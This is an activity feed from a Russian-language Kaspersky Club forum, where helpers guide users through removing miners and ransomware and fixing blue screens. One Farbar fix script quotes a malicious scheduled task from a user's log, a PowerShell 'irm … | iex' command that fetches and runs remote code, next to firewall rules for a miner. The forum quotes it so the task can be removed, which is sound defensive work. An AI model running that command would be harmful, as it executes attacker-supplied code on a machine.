Активность
- Последний час
-
Welder1987 scored 93% in a quiz: Викторина по Telegram каналу клуба
-
Эдуард180220379 подписался на Синий экран
-
Ищу помощи специалиста. Чистил ноутбук в этом разделе. После простоя ноутбук сейчас при включении выдал синие экраны. И не могу обновить приложение, ночью не мог и сейчас не могу. Вчера обновил видео драйвер, поставил бесплатный касперский и все, запустил после всего запрет. Он выдавал not-a-virus:HEUR:RiskTool.Multi.WinDivert.gen я его разрешил.
-
- помощь
- синий экран
-
(и ещё 2 )
C тегом:
-
Здравствуйте, ищу помощи специалиста, нашёл у себя в ноутбуке проблемы.
Эдуард180220379 ответил Эдуард180220379 тема в Помощь в удалении вирусов
Благодарю вас -
Здравствуйте, ищу помощи специалиста, нашёл у себя в ноутбуке проблемы.
thyrex ответил Эдуард180220379 тема в Помощь в удалении вирусов
Обратитесь в соседний раздел. Быть может там подскажут. -
Здравствуйте, ищу помощи специалиста, нашёл у себя в ноутбуке проблемы.
Эдуард180220379 ответил Эдуард180220379 тема в Помощь в удалении вирусов
Что можно сделать с синими экранами? -
У нас раздел Заказы вообще перестал работать. Не открывается адрес страницы https://forum.kasperskyclub.ru/clients/orders/. Не доступен.
-
Здравствуйте, ищу помощи специалиста, нашёл у себя в ноутбуке проблемы.
thyrex ответил Эдуард180220379 тема в Помощь в удалении вирусов
Майнер тут точно не виноват. И чистка его следов тоже. По возможности исправьте: Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.42.34438 v.14.42.34438.0 Внимание! Скачать обновления Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.42.34438 v.14.42.34438.0 Внимание! Скачать обновления Microsoft OneDrive v.25.115.0615.0002 Внимание! Скачать обновления WinRAR 7.01 (64-разрядная) v.7.01.0 Внимание! Скачать обновления Discord v.1.0.9032 Внимание! Скачать обновления AmneziaVPN v.4.8.5.0 Внимание! Скачать обновления Adobe Acrobat (64-bit) v.25.001.20531 Внимание! Скачать обновления ^Проверьте обновления через меню Справка - Проверить обновления!^ -
Проблема решена?
-
Здравствуйте, ищу помощи специалиста, нашёл у себя в ноутбуке проблемы.
Эдуард180220379 ответил Эдуард180220379 тема в Помощь в удалении вирусов
SecurityCheck.txtFixlog (2).txt После простоя ноутбук сейчас при включении выдал синие экраны. И не могу обновить приложение, ночью не мог и сейчас не могу. Вчера обновил видео драйвер, поставил бесплатный касперский и все, запустил после всего запрет. Он выдавал not-a-virus:HEUR:RiskTool.Multi.WinDivert.gen. - Сегодня
-
Fixlog.txt
-
Arian scored 100% in a quiz: Викторина по Telegram каналу клуба
-
mimic/n3wwv43 ransomware Троян ISTANBULTEAM зашифровал файлы
safety ответил MirTa тема в Помощь в борьбе с шифровальщиками-вымогателями
Зайти на сервер могут либо из внешней сети, если сервер виден из внешней сети, либо из локальной сети. т.е. надо ограничивать доступ извне либо через белые листы IP, либо через VPN. -
Вы бы сразу и ссылку давали, а не только цитату )))
-
mimic/n3wwv43 ransomware Троян ISTANBULTEAM зашифровал файлы
MirTa ответил MirTa тема в Помощь в борьбе с шифровальщиками-вымогателями
То есть злоумышленники, подобрав пароль прямо на сервер заходят? -
Троян ISTANBULTEAM зашифровал файлы
safety ответил MirTa тема в Помощь в борьбе с шифровальщиками-вымогателями
Антивирус то защитит, но надо еще и антивирус защитить. :). Чтобы его не отключили злоумышленники после получения доступа на устройство. Поэтому необходима комплексная защита: от проникновения и запуска вредоносных программ. По выбору продукта для сервера лучше уточните в Технической поддержке какой вам подойдет. -
Троян ISTANBULTEAM зашифровал файлы
MirTa ответил MirTa тема в Помощь в борьбе с шифровальщиками-вымогателями
Подскажите, пожалуйста, ваш антивирус защитит от проникновения шифровальщика? Посоветуйте что приобрести для сервера? -
Файловая система никак не связана с типом диска. Если это Windows, то в 99,9% файловая система будет NTFS на любом стационарном диске. В любом случае в пределах однотипной операционной системы (например любая версия Windows) при переносе данных не имеет значения какая файловая система на диске.
-
Здравствуйте. 1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать) Start:: CreateRestorePoint: HKLM\...\Run: [CAA Service] => C:\ProgramData\CAAService\CAAServices.exe (Нет файла) Task: {5A611B79-55B4-4E61-BF10-E056850633C2} - System32\Tasks\Microsoft\Office\Office Persistent Activation => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-03-12] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activate.techias.co.uk/ | iex" <==== ВНИМАНИЕ Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Нет файла) Folder: C:\ProgramData\CAAService 2025-07-19 01:27 - 2025-07-19 01:57 - 000000000 ____D C:\ProgramData\CAAService FirewallRules: [{aa9a8062-fb22-4510-be21-0dbe26e8598d}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{56e01aad-2709-49f1-b029-c3e5f5c5494e}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{454e207d-542c-47f9-94ea-cd58f66d7756}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{f4eaacfd-6b8f-4145-b697-6a46085da34b}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{0d13204a-8c8d-444a-a517-620c0705a12b}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{752ca4cc-7a11-457c-8686-dfe3db5d9fee}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{2b1d893f-1357-495b-9e67-a2eae1db27bd}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{1edc3c4e-dfc2-4576-a6dc-7424003c2032}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{099255c8-c4bf-476e-b69f-836716d70fd0}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{e8cb1544-6ec8-4df2-ae31-8027b3995c0a}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{840c6b1f-7635-4c45-88bc-f616e29ef7cf}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{71f2e40a-3c7f-4319-befc-f64147857391}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{f6623a94-cb98-4e82-a385-16a498ebc0f6}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{fc1329f8-41df-464c-a710-f20bfdf2914a}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла Reboot: End:: 2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши. 3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера.
-
Здравствуйте, ищу помощи специалиста, нашёл у себя в ноутбуке проблемы.
thyrex ответил Эдуард180220379 тема в Помощь в удалении вирусов
это лишнее. 1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать) Start:: CreateRestorePoint: StartPowershell: Remove-MpPreference -ExclusionPath "C:\Program Files\RDP Wrapper" EndPowerShell: Reboot: End:: 2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши. 3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера. Загрузите SecurityCheck by glax24 & Severnyj и сохраните архив на Рабочем столе. Разархивируйте, запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10/11);Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;Прикрепите этот файл в своем следующем сообщении. -
Константин И.М. подписался на Как перенести файлы с одного диска на другой?
-
Как перенести файлы с одного диска на другой?
Константин И.М. ответил Бебра тема в Компьютерная помощь
Вот что выдал поиск в интернете: «Для твердотельных накопителей (SSD) и жёстких дисков (HDD) используются разные файловые системы.» -
Давайте для начала посмотрим SMART диска. Скриншот покажите. Дальше сделаем проверку системных файлов: в командной строке, запущенной от имени администратора, выполните: sfc /scannow
-
С Днём Рождения!
-
Kaspersky Club | Клуб «Лаборатории Касперского» поздравляет всех празднующих сегодня день рождения юзеров. orsay (39)Пират82 (43)Rimma_Rimma (27)
- Вчера
-
Доброго времени суток. Столкнулась с проблемой майнер CAAServieces.exe. Начала искать способы по отключению, удалению вируса. Отключить отключила, Из реестра удалила, Удалила. Провела несколько проверок через антивирусы - чисто. Только при перезагрузке и некоторого времени (1-2 минуты) создается снова папка и файл с вирусом (но не запускается) по расположению: C:\ProgramData\CAAService. Прикладываю проверку с KVRT и AutoLogger. Найдя на форуме такую же проблему - уже решённую ранее - прикрепляю логи из FRST64 CollectionLog-2025.07.19-02.48.zip Addition.txt FRST.txt
-
Ferri присоединился к сообществу
-
Здравствуйте, ищу помощи специалиста, нашёл у себя в ноутбуке проблемы.
Эдуард180220379 ответил Эдуард180220379 тема в Помощь в удалении вирусов
Благодарю вас. Хочу отправить скромный донат в благодарность. Буду ждать от вас рекомендации. -
[РЕШЕНО] Два dwm.exe процесса один из которых скрытый майнер
thyrex ответил Garguha тема в Помощь в удалении вирусов
Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в Турцию, Армению, Сочи, Камбоджу можете быть и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского". -
Здравствуйте, ищу помощи специалиста, нашёл у себя в ноутбуке проблемы.
thyrex ответил Эдуард180220379 тема в Помощь в удалении вирусов
Не скачивать с торрентов активаторы, репаки. Это основной путь попадания майнеров на компьютер. Финальные рекомендации выдам уже днем.